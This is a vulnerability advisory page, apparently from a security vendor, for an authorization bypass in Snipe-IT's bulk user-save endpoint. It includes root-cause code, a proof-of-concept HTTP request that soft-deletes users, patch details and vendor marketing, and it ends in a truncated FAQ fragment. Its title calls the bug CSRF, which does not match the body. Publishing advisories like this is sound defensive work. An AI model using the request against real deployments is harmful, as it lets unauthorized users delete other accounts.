Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🐘
🐘 Packagist
Not in CISA KEV
HIGH severity

GHSA-vgx7-c78r-69w9 snipe/snipe-it

HIGHFix: grokability/snipe-it@374f426

GHSA-vgx7-c78r-69w9 is a high-severity (CVSS 7.1) CWE-863 vulnerability in snipe/snipe-it. A fix is available for snipe/snipe-it — see the affected versions and patch details below.

Snipe-IT has an authorization bypass on bulk editing users

Also known asCVE-2026-55460
Published
Aug 28, 2026
Updated
Aug 28, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Sep 19, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.

Exploitation and automatability from CISA’s SSVC triage for GHSA-vgx7-c78r-69w9.

EPSS Exploitation Probability

via FIRST.org ↗
0.4%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs38th percentile — riskier than 38% of all scored CVEsHighest risk

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

How urgent is this, really

GHSA-vgx7-c78r-69w9 plotted by exploitation likelihood (EPSS) against impact (CVSS). The shaded corner — EPSS 50%+ and CVSS 7.0+ — is where this CVE doesn't sit, though severity or exploitability alone can still warrant action.

Where this sits among everything scored

Of 377,166 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Real counts from FIRST.org, not a sample — log-scaled since the landscape is heavily right-skewed.

Real-World Exposure

1 pkg affected
🐘snipe/snipe-it

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.

Description

Impact

An authenticated non-admin user with users.view and users.edit, but without users.delete, can directly POST to /users/bulksave and soft-delete another non-admin user. The UI and confirmation route require users.delete, but the destructive sink only authorizes update.

Attacker Model

Authenticated non-admin user with:

{"users.view":"1","users.edit":"1"}

The attacker does not have users.delete, admin, or superuser.

Affected Component

  • routes/web/users.php

  • app/Http/Controllers/Users/BulkUsersController.php

  • Endpoint: POST /users/bulksave

Root Cause

The UI only exposes bulk delete to users with delete permission:

@can('delete', \App\Models\User::class)
    <option value="delete">...</option>
    <option value="merge">...</option>
@endcan

The confirmation path also checks delete:

} elseif ($request->input('bulk_actions') == 'delete') {
    $this->authorize('delete', User::class);

However, the destructive route is registered separately:

Route::post('bulksave', [Users\BulkUsersController::class, 'destroy'])
    ->name('users/bulksave');

and destroy() authorizes only update:

public function destroy(Request $request)
{
    $this->authorize('update', User::class);

When delete_user=1 is present, the method reaches:

$user->delete();

Proof of Concept

  1. Create a non-admin attacker account with users.view and users.edit, but not users.delete.

  2. Create a harmless non-admin target user.

  3. Log in as the attacker and obtain a valid CSRF token.

  4. Send:

POST /users/bulksave HTTP/1.1
Host: <snipe-it-host>
Cookie: snipeit_session=<attacker-session>
Content-Type: application/x-www-form-urlencoded

_token=<csrf-token>
ids[]=<target-user-id>
delete_user=1
status_id=<valid-status-id>

Observed response:

HTTP/1.1 302 Found
Location: http://<snipe-it-host>/users

Patches

Patched in 374f426f0c

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐘Packagistsnipe/snipe-itall versions8.6.2composer require snipe/snipe-it:^8.6.2

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for snipe/snipe-it, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update snipe/snipe-it to 8.6.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-vgx7-c78r-69w9 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like GHSA-vgx7-c78r-69w9 can be triaged on real exposure rather than presence alone.

Tailored to GHSA-vgx7-c78r-69w9. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Impact An authenticated non-admin user with `users.view` and `users.edit`, but without `users.delete`, can directly POST to `/users/bulksave` and soft-delete another non-admin user. The UI and confirmation route require `users.delete`, but the destructive sink only authorizes `update`. ### Attacker Model Authenticated non-admin user with: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ json {"users.view":"1","users.edit":"1"} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The attacker does not have `users.delete`, `admin`, o
O3 Security · Impact-Aware SCA

Is GHSA-vgx7-c78r-69w9 in your dependencies?

O3 Security finds GHSA-vgx7-c78r-69w9 across Packagist dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.

GHSA-vgx7-c78r-69w9: CSRF (High 7.1) | O3 Security